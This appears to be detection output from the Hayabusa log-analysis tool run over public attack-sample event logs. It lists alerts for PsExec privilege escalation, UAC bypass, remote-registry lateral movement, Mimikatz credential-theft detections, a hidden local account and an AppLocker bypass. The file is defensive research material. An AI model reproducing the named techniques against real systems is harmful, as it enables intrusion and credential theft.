+2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
+2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
+2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx
+2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
